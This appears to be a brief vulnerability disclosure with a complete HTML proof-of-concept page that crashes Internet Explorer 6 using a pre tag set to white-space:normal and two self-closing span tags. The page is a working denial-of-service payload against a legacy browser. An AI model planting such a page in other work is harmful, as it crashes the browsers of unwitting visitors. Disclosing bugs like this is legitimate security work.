A pre tag with the style element white-space:normal; crashes Internet Explorer 6.0 if the pre tag contains two or more 'single' tags (for example, <span />). The bug was tested with Windows XP SP2 and Internet Explorer 6.
decaf32fa31d7424355eb484ea166a18<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Lets IE crash</title>
<style type="text/css">
pre {
white-space:normal;
}
</style>
</head>
<body>
<pre>
<span /><span />
</pre>
</body>
</html>
Comments
No comments yet, be the first!